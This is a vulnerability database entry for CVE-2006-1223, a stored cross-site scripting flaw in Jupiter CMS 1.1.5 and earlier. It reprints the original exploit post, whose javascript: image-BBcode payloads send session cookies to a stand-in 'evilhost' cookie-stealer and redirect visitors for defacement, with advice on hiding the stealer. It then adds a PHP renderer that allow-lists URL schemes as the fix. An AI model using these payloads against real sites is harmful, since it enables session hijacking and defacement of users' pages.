Jupiter Content Manager Cross-Site Scripting Vulnerability

Vulnerability ID: 1109901
Vulnerability type: Cross-site scripting
Published: 2006-03-11
Updated: 2006-03-15
CVE ID: CVE-2006-1223
CNNVD ID: CNNVD-200603-257
Platform: PHP
CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/1576
https://cxsecurity.com/issue/WLB-2006030064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-257
|Vulnerability details
Jupiter Content Manager 1.1.5 and earlier contain a cross-site scripting (XSS) vulnerability: a remote attacker can inject arbitrary web script or HTML through a JavaScript URI placed in the image BBcode tag.
|Vulnerability EXP
Jupiter CMS <= 1.1.5 multiple XSS attack vectors.

Discovered by: Nomenumbra/[0x4F4C]  Date: 3/11/2006  Impact: high (privilege escalation, site defacement)

Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users
to subscribe and post events. Because no filtering is done upon [image] BBcode input, any user is
capable of inserting arbitrary javascript code, allowing for credential theft leading to session
hijacking and possibly site defacement.

Examples:

This would make a message box pop up saying 'XSS', whenever the events get loaded (on the main page,
calendar, etc.): [image=javascript:alert('XSS')]

This would allow an attacker to steal session IDs, which he could insert into his own cookie to
hijack sessions and elevate his/her privileges:

[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)]

It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe
the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice,
to avoid suspicion and disclosure of your cookiestealer's location.

This injection would allow an attacker to redirect users to a page of his choice, effectively
defacing the page:

[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')]

As you can see the possibilities are limitless, as long as you have a bit of fantasy!

Nomenumbra/[0x4F4C]

Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com

# milw0rm.com [2006-03-11]
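The root cause above is that the URL inside an [image=...] tag is copied straight into an <img src> attribute, so a javascript: URI becomes executable script. The following is an added example of the corrective pattern, not Jupiter CMS's own code (which is not shown on this page): a PHP renderer that allow-lists the URL scheme to http/https and HTML-escapes every byte that reaches the page. The function names (h, is_safe_image_url, render_image_bbcode) and the sample inputs are constructed for this example.

```php
<?php
declare(strict_types=1);

// Added example, not Jupiter CMS code: safe rendering of the [image=...]
// BBcode tag. Two controls are applied: (1) the URL scheme must be http or
// https, so javascript:, data:, vbscript: and scheme-less tricks are refused;
// (2) all text, including refused tags, is HTML-escaped before output.

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function is_safe_image_url(string $url): bool
{
    // Browsers drop control characters and whitespace inside a scheme
    // ("java\tscript:"), so reject them outright rather than normalising.
    if (preg_match('/[\x00-\x20\x7f]/', $url) === 1) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;   // relative, protocol-relative ("//host/x") or unparsable
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

function render_image_bbcode(string $input): string
{
    $out = '';
    $offset = 0;
    preg_match_all('/\[image=([^\]]*)\]/i', $input, $matches, PREG_OFFSET_CAPTURE);
    foreach ($matches[0] as $i => [$tag, $pos]) {
        // Plain text between tags is escaped, never passed through raw.
        $out .= h(substr($input, $offset, $pos - $offset));
        $url = $matches[1][$i][0];
        // Allowed URL: emit <img> with the escaped URL as the attribute value.
        // Anything else is shown as literal, escaped text and never becomes markup.
        $out .= is_safe_image_url($url)
            ? '<img src="' . h($url) . '" alt="">'
            : h($tag);
        $offset = $pos + strlen($tag);
    }
    $out .= h(substr($input, $offset));
    return $out;
}

// Constructed sample inputs, including the javascript: payload quoted in the advisory.
$samples = [
    '[image=http://example.com/pic.png]',           // rendered as <img>
    "[image=javascript:alert('XSS')]",              // shown as escaped text
    '[image=JaVaScRiPt:alert(1)]',                  // case games do not help
    "[image=java\tscript:alert(1)]",                // control char inside scheme
    '<b>hi</b> [image=//evil.example/x.png]',       // raw HTML escaped, no scheme refused
];
foreach ($samples as $s) {
    echo $s, "\n  => ", render_image_bbcode($s), "\n";
}
```

The check is deliberately a positive allow-list on the parsed scheme plus a host requirement, rather than a search for the string "javascript:"; a deny-list would miss case variants, embedded control characters and other URI schemes that browsers will still execute.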
|References

Source: BID, 17072
Link: http://www.securityfocus.com/bid/17072
Source: BUGTRAQ, 20060311 Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
Link: http://www.securityfocus.com/archive/1/archive/1/427406/100/0/threaded
Source: VUPEN, ADV-2006-0942
Link: http://www.frsirt.com/english/advisories/2006/0942
Source: SECUNIA, 19215
Link: http://secunia.com/advisories/19215
Source: XF, jupitercm-bbcodetag-xss(25241)
Link: http://xforce.iss.net/xforce/xfdb/25241
Source: BUGTRAQ, 20060412 Re: Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
Link: http://www.securityfocus.com/archive/1/archive/1/430903/100/0/threaded
Source: OSVDB, 23839
Link: http://www.osvdb.org/23839
Source: www.jupiterportal.com
Link: http://www.jupiterportal.com/index.php?n=modules/forum&a=3&d=11&o=5&q=313
Source: SREASON, 572
Link: http://securityreason.com/securityalert/572